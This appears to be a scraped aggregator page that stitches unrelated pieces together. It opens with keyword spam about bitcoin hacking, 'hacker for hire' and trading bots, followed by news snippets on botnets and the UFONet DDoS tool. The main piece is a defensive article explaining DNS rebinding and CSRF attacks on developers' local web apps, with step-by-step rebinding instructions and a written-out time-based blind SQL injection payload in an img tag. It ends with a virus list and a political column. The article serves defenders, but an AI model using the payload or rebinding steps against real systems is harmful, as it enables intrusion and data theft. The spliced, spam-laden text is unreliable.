hack bitcoin private key hack bitcoins online hack bitcoin wallet android bitcoin and hacker bitcoin attacco hacker bitcoin baron hacker bitcoin china hackers bitcoin double spend hacker news bitcoin exchange hacker bitcoin for hackers bitcoin growth hacking bitcoin hacker bitcoin hacker 2017 bitcoin hacker android bitcoin hacker angriff bitcoin hacker apk bitcoin hacker arrested bitcoin hacker attack bitcoin hacker caught bitcoin hacker dojo bitcoin hacker experience bitcoin hacker for android bitcoin hacker for hire bitcoin hacker forum bitcoin hacker free bitcoin hacker free download bitcoin hacker generator bitcoin hacker hunted bitcoin hacker news bitcoin hacker online bitcoin hacker software bitcoin hacker tool bitcoin hackers forum bitcoin hackers steal $2.6m from silk road bitcoin hacking guide bitcoin mining hacker bitcoin mining hacker news bitcoin stolen by hackers bitcoin wallet hacker hacker bitcoin indonesia hacker bitcoin miner hacker compte bitcoin hacker currency bitcoin crashes hacker de bitcoin hacker di bitcoin hacker dojo bitcoin atm hacker experience bitcoin market hacker experience bitcoin miner hacker para bitcoin hacker rouba bitcoin hacker-währung bitcoin lifehacker bitcoin the face behind bitcoin hacker news automated cryptocurrency trading bot best cryptocurrency bot best cryptocurrency trading bot bottle caps cryptocurrency cryptocurrency arbitrage bot cryptocurrency bot cryptocurrency bot trading cryptocurrency botnet cryptocurrency exchange bot cryptocurrency faucet bot ryptocurrency trading bot free cryptocurrency bot free cryptocurrency trading bot open source cryptocurrency trading bot automated bitcoin trading bot best bitcoin trading bot bitcoin arbitrage trading bot bitcoin bitcoin trading bot bitcoin day trading bot bitcoin ema trading bot bitcoin high frequency trading bot bitcoin margin trading bot bitcoin market maker bot bitcoin market making bot bitcoin simple trade bot haasonline bitcoin trading bot bitcoin trading bot 2017 bitcoin trading bot algorithm bitcoin trading bot api bitcoin trading bot bitcointalk bitcoin trading bot bitstamp bitcoin trading bot btc-e bitcoin trading bot chrome bitcoin trading bot code bitcoin trading bot cryptsy bitcoin trading bot download bitcoin trading bot for btc-e and mtgox bitcoin trading bot free bitcoin trading bot freeware bitcoin trading bot github bitcoin trading bot java bitcoin trading bot kraken bitcoin trading bot linux bitcoin trading bot mac bitcoin trading bot mintpal bitcoin trading bot mtgox bitcoin trading bot open source bitcoin trading bot php bitcoin trading bot profit bitcoin trading bot python bitcoin trading bot reddit bitcoin trading bot review bitcoin trading bot script bitcoin trading bot software bitcoin trading bot strategy bitcoin trading bot tutorial bitcoin trading bot windows butter-bot bitcoin trading robot buy bitcoin trading botbitcoin trading bot, bitcoin trading bot 2017, bitcoin trading bot free, bitcoin trading bot open source, bitcoin trading bot python, bitcoin trading bot review, bitcoin trading bot strategy do bitcoin trading bots work how to make a bitcoin trading bot how to make bitcoin trading bot how to write a bitcoin trading bot online bitcoin trading bot simple bitcoin trading bot trading bot for bitcoin what is a bitcoin trading bot.
==========================================================
          Media Alert: WatchGuard Presents "Understanding and Blocking the Evolving Bot" at RSA        
WatchGuard Security Experts Provide In-depth Analysis and Network Defense Techniques to Thwart Botnet Attacks

          Cisco: maleje ilość spamu, rośnie liczba ataków wymierzonych w określone cele, a pracownicy nowej generacji mają skłonność do ignorowania zagrożeń internetowych        
Rok 2010 to punkt zwrotny w rozwoju cyberprzestępczości? wtedy właśnie po raz pierwszy zaczęła maleć ilość generowanego spamu. W 2011 r. tendencja ta utrzymała się, głównie w wyniku likwidacji w ciągu ostatnich dwóch lat kilku kluczowych botnetów. Liczba luk w zabezpieczeniach wzrosła, odnotowano mniej ataków podejmowanych na szeroką skalę, natomiast zwiększyła się liczba ataków ukierunkowanych na określone cele. To niektóre spośród najważniejszych wniosków z Cisco 2011 Annual Security Report (Dorocznego raportu Cisco nt. bezpieczeństwa w 2011 r.), w którym przedstawiono najbardziej znaczące tendencje w zakresie zagrożenia dla bezpieczeństwa w sieci odnotowane w tym roku oraz zamieszczono wskazówki i wytyczne, których przestrzeganie pozwoli firmom zapewnić większe bezpieczeństwo ich środowisk biznesowych. W 5. edycji dorocznego raportu Cisco nt. bezpieczeństwa po raz pierwszy przeanalizowano także dogłębnie, jak zachowania nowej generacji pracowników zwiększają ryzyko osobiste i korporacyjne w i tak już skomplikowanej sytuacji w zakresie bezpieczeństwa.
          UFONet – Open Redirect DDoS Tool        

UFONet is an open redirect DDoS tool designed to launch attacks against a target, using insecure redirects in third party web applications, like a botnet. Obviously, only for testing purposes. The tool abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc. […]

The post UFONet – Open Redirect DDoS Tool appeared first on Darknet - The Darkside.


          The Pirate Bay. And now something completely different        
I’ve seen an awful lot of folk throwing all of their toys out of the pram in light of the news that the Pirate Bay is to be sold to some shady company who wish to monetise it. Botnets have been summoned to take down the Pirate Bay’s homepage, and many people appear to have […]
          5 ways to have fun while not doing IPAM this Christmas        

At the end of a year overshadowed by Mirai botnets, leaked emails, late-night Twitter rants and talk of upgrading the dormant Cold War to Version 2.0,  perhaps this Christmas is the ideal time to sit back, pop that (nut) roast in the oven and relax with a little something different. Have your pick from this short collection of fun IPAM-like things to enjoy this festive season.


          Cylance blamed for DirectDefense’s ‘botnet’ disclosure        

Twenty-four hours after Carbon Black responded to a report from DirectDefense that their Cb Response product was leaking customer information (it doesn't), one company executive is pointing the finger at Cylance as the source of the disclosure.

Salted Hash covered the story yesterday. 

To recap: DirectDefense published a blog post accusing Carbon Black of being "the world’s largest pay-for-play data exfiltration botnet."

The reason is because their product, Cb Response, uploads files to VirusTotal if they're unknown. DirectDefense called this a serious breach of confidentiality, noting that Carbon Black's "prevalence in the marketspace and the design of their solution’s architecture seems to be providing a significant amount in data exfiltration."

To read this article in full or to leave a comment, please click here


          IT's 9 biggest security threats        

Years ago the typical hacking scenario involved a lone attacker and maybe some buddies working late at night on Mountain Dew, looking for public-facing IP addresses. When they found one, they enumerated the advertising services (Web server, SQL server and so on), broke in using a multitude of vulnerabilities, then explored the compromised company to their heart's content. Often their intent was exploratory. If they did something illegal, it was typically a spur-of-the-moment crime of opportunity.

My, how times have changed.

When describing a typical hacking scenario, these days you must begin well before the hack or even the hacker, with the organization behind the attack. Today, hacking is all crime, all the time, complete with bidding markets for malware, crime syndicates, botnets for hire, state actors, and cyber warfare gone amok.

To read this article in full or to leave a comment, please click here


          IDG Contributor Network: It’s time for defensive worms        

We’re entering a new age of cybersecurity, where worms will be just as critical for defense as they are for offense. This is going to surprise many people in the security industry, who for many years have thought of worms as only a malicious tool.

To provide some historical context, for the past 10+ years, the security community and government have been obsessed with botnets and “Advanced Persistent Threats.” Most of the defensive tools and strategies, as well as cyber laws, regulations and policies, are centered around these threats. But the truth is, worms are the real basis of many of the most advanced actors on the stage. After all, what were Stuxnet, Flame and Duqu but worms at heart? All top-line nation-state tools are capable of self-replication, as autonomous operation is the key to any cyber espionage effort where gaining persistence on an air-gapped network is required.

To read this article in full or to leave a comment, please click here


          Pentest firm calls Carbon Black "world’s largest pay-for-play data exfiltration botnet"        

On Wednesday, DirectDefense, Inc. disclosed that they've discovered hundreds of thousands of files from Carbon Black customers.

The discovery is said to pose a significant risk to Carbon Black's clients, because of the company's dependence on third-party multiscanners in the Cb Response product.

In a blog post, Jim Broome, president of DirectDefense said that the problems with Carbon Black's Cb Response were first detected when his firm was working an incident for a customer.

He describes the issue as a problem with "trust model leveraged between third party vendors utilized by Carbon Black’s Cb Response EDR platform, which sends end user files to a third-party antivirus multiscanner solution to determine if the files are safe for use in the enterprise network."

To read this article in full or to leave a comment, please click here


          Genetic Algorithm based Layered Detection and Defense of HTTP Botnet        

A System state in HTTP botnet uses HTTP protocol for the creation of chain of Botnets thereby compromising other systems. By using HTTP protocol and port number 80, attacks can not only be hidden but also pass through the firewall without being detected. The DPR based detection leads to better analysis of botnet attacks [3]. However, it provides only probabilistic detection of the attacker and also time consuming and error prone. This paper proposes a Genetic algorithm based layered approach for detecting as well as preventing botnet attacks. The paper reviews p2p firewall implementation which forms the basis of filtering. Performance evaluation is done based on precision, F-value and probability. Layered approach reduces the computation and overall time requirement [7]. Genetic algorithm promises a low false positive rate.
           #RootedCON2012 - DNS: A botnet dialect - Carlos Diaz Francisco J Gomez -- http://tco/imCPovz8        
2012-03-21 07:22:37 - ebordac : #RootedCON2012 - DNS: A botnet dialect - Carlos Diaz Francisco J Gomez -- http://tco/imCPovz8
          Fort Disco, Botnet yang berhasil menginfeksi 25.000 Komputer Windows        

Belum lama ini, Arbor Network melaporkan bahwa terdapat varian baru botnet yang telah berhasil menginfeksi malware ke lebih dari 25.000 komputer yang bersistem operasi Windows. Botnet ini mengggunakan metode yang belum diketahui caranya untuk menginfeksi korbannya. Hal yang pasti adalah, sekali terinfeksi, komputer korban akan dapat digunakan untuk menyebarkan botnet baru ini untuk menyerang sistem lain.


Apa itu Botnet??

Bagi yang belum tau apa itu botnet, botnet berasal dari kata robot network yaitu sekumpulan PC zombie yang sudah terinfeksi oleh virus malware dimana virus malware dikirimkan oleh seorang master botnet atau pengendali botnet yang bisa dibilang hacker karena telah menembus firewall dan masuk ke system komputer untuk menanamkan virus malware melalui internet. Ketika PC zombie atau PC yang sudah terinfeksi virus malware, maka master botnet dapat mengendalikan ribuan PC zombie melalui server PC C&C. C&C adalah Command and Control yaitu server komputer untuk memberi perintah dan dapat mengontrol ribuan PC zombie untuk penyerangan. Penyerangan bisa dengan DDOS attack, Spam message, dll. Tentu sangat mengerikan ketika seseorang berhasil mengendalikan Botnet ini, karena target sangat mudah ditaklukan, biasanya PC zombie digunakan untuk menyerang dengan DDOS untuk menyerang satu target oleh ribuan PC.


berikut adalah gambaran ketika master botnet melakukan penyerangan dengan C&C.


Peneliti dari Arbor Security Engineering & Response Team (ASERT), Matthew Bing, mengatakan bahwa Arbor ASERT telah melakukan pelacakan terhadap botnet yang biasa dipanggil dengan Fort Disco ini sejak bulan mei 2013. Mereka telah berhasil mengidentifikasi 6 situs command-and-control (C&C) yang mengendalikan lebih dari 25.000 mesin Windows yang terinfeksi botnet. Diklaim oleh mereka bahwa situs-situs pengendali itu kebanyakan berasal dari Rusia dan Ukraina. Setelah terinfeksi oleh Fort Disco, maka mesin Windows akan melakukan serangan brute force untuk menebak password dari suatu blog dan CMS yang menggunakan PHP. Sampai saat ini, diduga telah lebih dari 6.000 instalasi Joomla, WordPress dan Datalife Engine yang menjadi korban serangan bruteforce.

Pada kesempatan itu, Matthew Bing mengatakan bahwa pola serangan ini memiliki beberapa fitur canggih yang membuatnya mustahil untuk sepenuhnya dilacak. Tidak hanya itu, cara agar malware ini dapat ter-install di dalam sistem pun masih belum jelas. Dia dan timnya baru mampu menemukan nama asli dari malware ini yaitu “maykl_lyuis_bolshaya_igra_na_ponizhenie.exe”. Nama malware ini merujuk ke buku karangan Michael Lewis yang berjudul “The Big Short: Inside The Doomsday Machine” dalam bahasa Rusia yang di dalamnya terdapat executable attachment. Nama file lainnya yaitu, “proxycap_crack.exe” yang merujuk pada crack dari program ProxyCap.

Bing menambahkan bahwa masih belum diketahui motif dari pengumpulan password. Walaupun begitu, masalah pencurian password telah menjadi masalah serius bagi komunitas keamanan. Banyak kelompok yang menargetkan forum profesional telah tertangkap. Mereka berharap untuk dapat mencuri detail dari login pengguna yang akan digunakan untuk hal-hal berbahaya.


#IndonesiaCyberNews

          â€œGiving Thanks for Cheap Botnet Attacks”        
There are Chinese websites offering distributed-denial-of-service (“DDoS”) attacks for sale.  Reminder: DDoS attacks generally involve a hacker taking control of a bunch of internet connected computers, or botnets, and telling them to flood a webserver with enough activity to crash the system.  While Chinese sites get a lot press, there are plenty of other places […]
          Imperva : le recul des botnets …        
Avec la quatrième édition de son rapport « Bot Traffic Report », Imperva met en lumière de nouvelles évolutions concernant la présence des bots sur internet.
          TDSS, un botnet à  250 000 dollars        
Nouvelle version, réseaux de partenaires, budget de développement, le business model des logiciels malveillants ressemble à s’y méprendre à celui du marché légal. Kaspersky a étudié le comportement du logiciel TDSS (également connu sous le nom de TDL), et plus particulièrement de la dernière version TDL-4.
          La version 6 de Network Security Platform cible les botnets        
McAfee sort une nouvelle version de son Système de prévention des intrusions (IPS). La version 6 de Network Security Platform (NSP) met l’accent sur le renforcement du contrôle des botnets.
          Le nombre de botnets en forte progression        
Microsoft tire le signal d’alarme. Selon l’entreprise, la menace botnet serait en train de croître fortement. C’est en effet ce que révèle le 9ème rapport de sécurité, réalisé à partir des données recueillies sur 600 millions d’ordinateurs dans le monde.
          Un botnet qui rapporte gros        
none
          Oracle s'offre le fournisseur de DNS Dyn, pour renforcer sa plateforme de cloud computing        
Oracle s'offre le fournisseur de DNS Dyn,
pour renforcer sa plateforme de cloud computing

Après avoir été le centre de l'attention des médias suite à une attaque du botnet Mirai qui a paralysé l'accès aux sites de ses clients à l'Est des États-Unis (même si certains sites étaient inaccessibles depuis l'Europe), Dyn revient dans l'actualité avec un nouvel accord de rachat qu'il a signé avec Oracle.

« Oracle a annoncé la signature d'un accord pour l'acquisition de Dyn, le principal fournisseur...
          Comment on Smart home security could be targeted by hackers by Botnet of hacked CCTV cameras responsible for world’s largest DDoS attack        
[…] Related: Smart home security could be targeted by hackers […]
          Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls        

Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common, they are all protected by a firewall.

Businesses typically protect their networks with hardware, dedicated and robust firewalls, while home users usually have it built in their routers. Firewalls are essential for internet security, since they prevent anyone from the outside to access the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

In this blog post, we will explain the different methods attackers can use to access vulnerable web applications behind firewalls, and we will also explain what countermeasures can be taken to thwart such attempts.

Table of Content

How many Developers are Vulnerable to These Type of Attacks?

It is difficult to estimate how many web developers can be vulnerable to such type of attacks. Though we have run a survey with web developers and here are some interesting facts:

  • 81% of respondents run their software on a web server
  • 89% claimed they keep their web server software up to date
  • 52% say they run vulnerable/undeveloped web applications on their server
  • 55% are running web apps in development on servers directly connected to the internet
  • 32% admitted to hardening the web applications on their test environment

According to the above statistics, 52% of web developers can be vulnerable to the type of attacks that documented in this article. That's quite a shocking statistic, but not a surprising one as Ferruh Mavituna explained when announcing the web developers survey results. An even more shocking fact is that 55% of the respondents admit that from time to time these web applications are running on computers which are connected directly to the internet. That's definitely something that businesses should tackle at the earliest possible.

A Typical Web Application Developer’s Test Setup

As a web application developer it is impossible to write code without having a proper testing environment. Fortunately, it is easy to install all the necessary pre-configured applications typically used for testing, so the majority of the developers run a web server on their machine.

For windows, there are popular applications such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, this can be easily done by installing the needed packages using a package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. Though in order to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0T.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?.

Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

Unfortunately many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. It is assumed that this form of Eggshell Security, hardened from the outside but vulnerable on the inside, allows them to run vulnerable test applications.

People also often assume that they are safe, even if a vulnerable or compromised machine is in the same network as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP-Spoofing to carry out Man-In-The-Middle (MITM) attacks.

But how can an attacker gain access to the development environment, when it is correctly configured to only listen on the loopback interface? Or even better, it is not even accessible from the outside because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: Through the developer’s web browser.

Attacking the Developer’s Vulnerable Test Setup Through the Web Browser

Logo of Google Chrome Logo of Microsoft Edge Logo of Mozilla Firefox Logo of Safari

Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality is steadily growing and through the years there have been some notoriously insecure browsers and plugins.  Attackers also tend to target browsers due to shortcomings in the design of some modern protocols and standards. Most of them have been built with a good intention, but can also lead to serious vulnerabilities and easy exploitation cross domain. For example, in some cases it is even possible to use the victim’s browser as a proxy and tunnel web request through it.

But new technologies are not the only problem with web browsers security. There are much older issues. For example one of the issues that has the biggest impact is the fact that every website is allowed to send data to any other accessible website. Contrary to popular belief, Same Origin Policy does not prevent the sending of data to a website. It only prevents browsers from retrieving the response. Therefore attacker.com can easily send requests to 127.0.0.1 and that is obviously a big problem.

In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

Vulnerable Test Websites on a Local Machine

The problem with Vulnerable Test Environments

http://localhost/

Security researchers and developers typically run vulnerable applications on their machines. For example, developers typically have web applications that are still in development stage, and maybe the security mechanisms are not in place yet, such as the CSRF tokens or authentication.

Security researchers have the same type of applications running on their computers. It is their job to find security issues so they are typically testing vulnerable web applications, which make them an easy target for these kinds of exploits.

Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two possibilities to attack the victim;

  1. Use a blind approach, during which the attacker has to brute force file and parameter names,
  2. Use a method with which he can actually view and explore the web application. This is where methods such as DNS rebinding come into play.

DNS Rebinding Attack

Image for a DNS Rebinding Attack

This attack method is simple and allows attackers to easily retrieve information from the victim’s computer if it is running a webserver. During this attack the malicious hacker exploits the web browser’s DNS resolution mechanism to retrieve information from the /secret/ subdirectory on the server, as explained below:

  1. The attacker sets up a website on a live domain, for example, attacker.com that is hosted on the IP address 11.22.33.44.
  2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN record.
  3. He serves a malicious script to the victim that when executed sends any data it finds back to the attacker controlled server every few minutes.
  4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
  5. Since the TTL was set to a very short time, the browser tries to resolve the IP address of attacker.com again when executing the script that is trying to get the content from the /secret/ sub directory. This needs to be done with a delay of about one minute to let the browser's DNS cache expire.
  6. Since the script is now running and the IP address of attacker.com is now set to 127.0.0.1, the attacker’s script effectively queries the content of 127.0.0.1/secret instead of 11.22.33.44/secret, thus retrieving the data from the victim’s /secret/ sub directory.

It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.

DNS Rebinding is a Preventable Attack

DNS Rebinding attacks can be prevented at web server level. We will talk more about prevention at the end of this article, but here is a little overview; as a developer, you should use FQDNs on your local web server such as local.com and whitelist those host headers, so any HTTP requests that do not have the host header in them can be rejected.

Shared hosting is prone to DNS Rebinding only to a certain degree. This is due to the fact that the web server determines which of the websites to server based on the host header. If the host header is not known to the web server it will return the default website. So in this scenario, only the default host is vulnerable to such attack.

Same Origin Policy is not completely bypassed

Since this is an entirely new domain that the user visited, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com even though it points to 127.0.0.1.

However, in many cases, a valid cookie is not needed, for example when a security researcher has a web application that is vulnerable to command injection vulnerability and no authentication is required. In such a case, the attacker can either use DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

The method we will be describing now is convenient if there are known vulnerable web applications on the victim’s computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and under some circumstances, one can even get feedback whether or not a CSRF attack has succeeded.

This method is too evident to be used for brute force attacks or to scan local networks since it requires a refreshing window or redirects. However, it can be done stealthily for short checks since multiple redirects are not strange to modern websites. Legitimate reasons for those are oauth implementations or ad networks that redirect users to different domains.

So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities an attacker can use a known exploit and send the data back to himself, either by using javascript with DNS rebinding, Out Of Band methods, or other Same Origin Breaches.

SQL injection Vulnerabilities on Your Local Network

Image for SQL injection vulnerabilities.

Imagine a Web Application is vulnerable to a SQL injection vulnerability in a SELECT statement that is only exploitable through a CSRF vulnerability, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application runs with the least privileges needed to successfully retrieve data. An attacker cannot use an out of band method on MySQL without root privileges since stacked queries do not work in such setup. Also, the attacker cannot just insert an INSERT statement right behind the query.

However, he can use the sleep command, which forces the SQL database to wait for a given amount of seconds before it continues to execute the query when combined with a condition. So for example, the attacker issues a command such as the following:

if the first character of the admin password is “a” sleep for 2 seconds.

If the request above takes less than two seconds to complete, then the first character in the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, then the first character of the password is “b”. The attacker can use this method to guess the remaining characters of the password.

This type of attack is called time based blind SQL injection. However, in the above scenario, it does not seem like a useful attack because the attacker cannot issue the requests directly, but has to resort to CSRF. Also, the delay can only be detected in the user's browser with a different page loading time.

Exploiting SQL injection Vulnerabilities Cross-Domain

JavaScript can be used to determine whether a page finished loading or not by using the “onload” or the “onerror” event handler. Let’s say the attack is GET based (even though POST is also possible) and the vulnerable parameter is called ID. The attacker can:

1. Record the time it takes for a page to load.

2. Point an img tag to the vulnerable application, e.g.

<img src = “http://192.168.1.123/admin.php?page=users&id=1+AND+IF+(SUBSTRING(DATABASE(),1,1)+=+'b',sleep(2),0)” onerror = “pageLoaded()”>

3. Record the time after the page finishes loading with pageLoaded().

4. Compare the values from step 1 and 3.

If there are two or more seconds difference in loading time, it means that the attack was successful and the first letter of the database is a “b”. If not, the attacker proceeds with the letters “c”, “d”, “e” and so on until there is a measurable time delay. Due to this timing side channel it is possible to leak page loading times and therefore, in combination with an SQL injection, valuable data.

Strong Passwords Are a Must, Even if The Web Application Is Not Public

Image for a password.

People tend to use weak passwords on web applications that are running on machines behind a firewall. Though that’s a wrong approach. Let’s say an attacker managed to compromise another computer in the same local network. If he notices a web application on another host he will try to brute-force the password for the admin panel. And if he guesses the credentials, since many modern web applications have upload functionality, the attacker can upload malicious files. Therefore an attacker is often able to plant a web shell on the server and issue commands on the machine hosting the web application.

But as mentioned above there does not need to be a compromise prior to the brute forcing. With DNS rebinding it is still possible to brute force the web application from a malicious website with a low latency, since the web application already runs on localhost and the requests do not need to go over the web.

Therefore it is important to always use strong passwords, no matter from where the application is accessible.

Insecure phpMyAdmin Instances Can Be Dangerous

Logo for phpMyAdmin, a very popular MySQL manager.

phpMyAdmin, a very popular MySQL manager is often installed on developer’s machines, and unfortunately, most of them are not secure. For example, on some install scripts MySQL and phpMyAdmin do not use authentication or use a blank password by default. This means that it is very easy to exploit this through DNS rebinding as no prior knowledge of a password is required to issue MySQL commands.

What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges - as the MySQL root user. This means that once an attacker gains access to it, he can:

  • Extract data from all databases
  • Read Files
  • Write files

In some configurations of MySQL, the file privileges are only allowed inside a specific directory. However, more often than not this security measure is not applied, especially in older versions. Therefore an attacker can read files and write attacker controlled content into the web root, which means he can plant a web shell, or a small script that allows him to issue system commands. Once he manages to do that most probably he will be able to escalate his privileges and place malware on the system or exfiltrate sensitive data.

Typical Vulnerable Devices Found On a Network

Routers Need To Be Kept Up To Date

Web applications are not the only objects at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface which typically runs with root privileges. Routers tend to be a popular and easy target because:

  • Web interfaces are poorly coded.
  • They sometimes have backdoors or remote controlled interfaces with standard passwords that users never change.
  • Since storage space is often tight on routers, manufacturers often use old and probably vulnerable versions of a software, as long as it serves the purpose.

In cases where routers’ admin web portal is not available from the outside, attackers can use DNS rebinding to log into the routers and hijack them. Such type of attacks are possible though they are not scalable, like the 2016 MIRAI malware infection. It infected thousands of home routers by using the default telnet password to gain admin access on the routers and add them to large botnets. Routers are typically hacked for a number of reasons, here are just a few:

  1. They can be used for Distributed Denial of Service (DDoS) attacks.
  2. Attackers can use them in a Man In The Middle attack (MITM) to intercept the traffic that passes through them.
  3. Attackers use them as a foothold to gain access to other machines on the router’s network, like what happened in the NotPetya ransomware in June 2017.

IOT Devices - Many of Which, Are Insecure

IOT Devices - Many of Which, Are Insecure

MIRAI did not only target home routers. Other victims included IP cameras and digital video recorders. More often than not security does not play an important role in the design of Internet Of Things (IOT) devices. And we install such insecure products on our home and corporate networks.

And to make things worse, many people who do not have IT security experience, tend to disable all firewalls and other security services on them to make the IOT devices, such as an IP camera, available over the internet. These types of setups can have unpredictable outcomes for the security of the devices connected to our networks, and can be an open door invitation to attackers and allow them to target other parts of the systems.

Vulnerability NAS Servers

NAS servers have become very common nowadays. They are used to manage and share files across all the devices on a network. Almost like any other device, NAS servers can be configured via a web interface, from which users for example, are allowed to download files.

NAS servers are also an additional attack surface. Similar to what we explained above, the attacker can use CSRF or DNS rebinding attack to interact with the web interface. Since these web interfaces typically have root access to allow the user to change ports etc, once an attacker gains access he can easily fully compromise the server.

Vulnerable Services Typically Used By Developers

Misconfigured MongoDB Services

Logo for MongoDB Services

On the rare occasion or a properly set up MongoDB instances to bind on localhost instead of 0.0.0.0, they can still be vulnerable to attacks through their REST API. The REST API is typically enabled because it is a useful feature for frontend developers. It allows them to have their own test datasets without having to rely on a finished backend. The data is returned in JSON format and can therefore be used with native JavaScript functions.

However this web interface has some serious flaws like CSRF vulnerabilities, that can lead to data theft as described in this proof of concept of a CSRF attack in the MongoDB REST API. In short, we used an OOB (Out of band) technique to exfiltrate the data over DNS queries. The API is marked as deprecated, however it was still present in the latest version we tested at the time we wrote the article.

DropBox information Disclosure

Logo for DropBox

Another rather interesting vulnerability is the one we found in the dropbox client for Windows. In order to communicate with the client, the website dropbox.com was sending commands to a websocket server listening on localhost.

However, by default websockets allow anyone to send and receive data, even when the request originates from another website. Therefore to verify the origin, the Dropbox client uses a handshake that needs to be correct in order to verify the sender's origin.

It consisted of a check of a nonce, a string of characters only known to dropbox and the client. It was directly queried from the Dropbox server and there was probably a check for the origin header. This means that a connection can take place, but no data could be sent from localhost if the origin was not correct.

However, when any random website connects to the websocket server on localhost, the Dropbox client would prematurely send a handshake request. The handshake request included information such as the id of that particular request, which OS was in using, and the exact version of the dropbox application. Such information should not be leaked through such channel, especially since it could be read by any third party website just by starting a connection request to the server on localhost.

Note: The issue was responsibly reported to Dropbox via Hackerone. It was immediately triaged and awarded with an initial bounty as well as a bonus since the report helped them find another issue.

How Can You Prevent These Type of Attacks?

Simply put, to prevent DNS rebinding attacks at server level just block access and requests when the host header in the HTTP request does not match a white list. Below is an explanation of how you can do this on Apache and IIS web server.

Blocking DNS Rebinding Attacks on Apache Server

On apache you can block access if the host header does not match 127.0.0.1 with mod_authz_host, by adding these lines to your configuration:

<If "%{HTTP_HOST} != '127.0.0.1'">

Require all denied

</If>

Therefore, if someone tries to launch a DNS rebinding attack, the requests will be blocked and the server will return a HTTP 403 message.

Blocking DNS Rebinding Attacks on Windows IIS

It is very easy to block DNS rebinding attacks on the Microsoft IIS web server. All you need to do is add a rule of type “Request blocking” in the URL rewrite menu with the following options:

  • The “Block access based on” field has to be set to “Host header”
  • The “Block request that” field has to be set to “Does Not Match the Pattern”. As pattern one or more host headers can be used. (source).

Other Measures to Block Such Type of Attacks

Another good countermeasure is to block third party cookies in the browser, and to use the same-site attribute in cookies on the web application that is being developed.

Other than that, apply the same security measures on internal websites as if they are publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection and other types of web vulnerabilities to guarantee a safe testing environment.

As an additional security measure run the web application on a virtual machine. Even though this is often not necessary, and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers that want to run vulnerable web applications on their machine.

Live Demo of Firewall Bypass

Sven Morgenroth, the researcher who wrote this article was featured during Paul's Security Weekly. During the show, Sven demoed how a hacker can actually exploit the above documented vulnerabilities to bypass firewalls.


          Virus que más daños han hecho:        

• Kneber botnet
• Storm Worm
• Leap-A/Oompa-A
• Passer y Netsky
• MyDoom
• Nimda:(2001) s conocido como el de más rapida expansión, 22 minutos pasaron desde que se lanzo a la red hasta que encabezo las listas de lso ataques más peligrosos.
• SQL Slamer/Sapphire
• Code Red y Code Red II
• Klez:(2001)fue uno de los primeros virus en ganar sofisticacion, podía desactivar antivirus y hacerse pasar por estos.actuaba como gusano y troyano y podía hacerse pasar por el emisor de un correo.
• I LOVE YOU: fue detectado el jueves 4 de mayo del 2000 al infectar a miles de ordenadores en todo el mundo, este código a sido considerado como uno de los más rápidos en propagarse e infectar a muchos ordenadores.
• Melissa: atacó a miles de usuarios y empresas.después de haber sido esparcido como un documento de ms-word infectado en un grupo de noticias de usenet, que conformaban una lista d interés sobre páginas porno.
• Monkey
• Natas
• Ping Pong
• Viernes 13
• Miguel Angelo


http://www.tecnoget.com/los-10-virus-informaticos-mas-letales


          Exactly How Stupid of an Idea Is a U.S.-Russia Cybersecurity Unit?        

You probably felt much safer after President Trump tweeted Sunday that he and Vladimir Putin had agreed to form an “impenetrable Cyber Security unit” to protect us from future computer intrusions. With Russia helping to oversee cybersecurity for our next election cycle, what could possibly go wrong?

Trump appears to have developed some misgivings about the supposed agreement (or at least the reaction to it), tweeting later Sunday that just because he and Putin “discussed a Cyber Security unit doesn’t mean I think it can happen. It can’t-but a ceasefire can,& did!”

Whenever people advertise their cybersecurity product/service/team/unit/company as “impenetrable,” it’s a good sign that you should run away as fast as possible when they offer you a contract. Arguably, whenever someone tries to tamper with your elections or target voting software vendors and local election officials, that’s also a good sign that you should run away as fast as possible when they propose a cybersecurity partnership. Actually, don’t run. Shut off your smartphone, set up two-factor authentication, and don’t click on any links in your email.

